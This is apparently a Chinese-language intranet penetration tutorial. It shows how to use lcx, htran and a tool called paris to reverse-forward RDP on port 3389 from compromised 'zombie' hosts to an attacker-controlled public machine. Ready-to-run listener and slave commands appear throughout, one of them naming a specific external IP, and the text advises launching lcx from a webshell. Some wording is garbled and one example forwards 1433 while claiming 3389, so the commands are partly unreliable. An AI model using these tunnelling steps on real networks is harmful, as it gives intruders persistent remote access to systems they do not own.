lcx没有连上的话，那就用下教主的paris高级内网渗透工具paris，工具其他功能不多说了，只说下端口映射的功能，传msxidc和vvxdc.dll到目标内网机器，在目标机器执行：msxidc -l127.0.0.1 -p3389 -m82 -s61.149.230.28 -r22，在自己机器或者有公网ip的安全：mapserver.exe -p22，这时候只要连接本机的或者公网ip安全的22端口就可以了，在说一款比较不错的工具，htran.exe，能开启socks5服务，但我们只说端口映射，命令：在公网安全监听(临听任意两个端口):htran -p -listen 119 120，在内网的机器执行：htran -p -slave 公网安全ip 119 127.0.0.1 3389，这样是把这个内网安全的3389转发到公网安全或者自己机器的119端口上，然后再用3389登陆器连接公网安全的120端口。或者连接本机的120端口，如图11所示。





首先在自己机子的cmd下运行
lcx.exe -listen 51 3389
意思是监听51端口并转发到3389端口
然后在肉鸡上运行 lcx.exe -slave 你的IP 51 肉机IP 1433
意思是 把肉机的3389端口 转发到 自己的IP 51端口上

提权思路：利用webshell执行lcx，实现端口发。

lcx.exe -slave 127.0.0.1 51 192.168.1.13 3389

自己机子
lcx.exe -listen 51 3389
在肉鸡上
lcx.exe -slave 自己的外网IP 51 肉机内网IP 3389
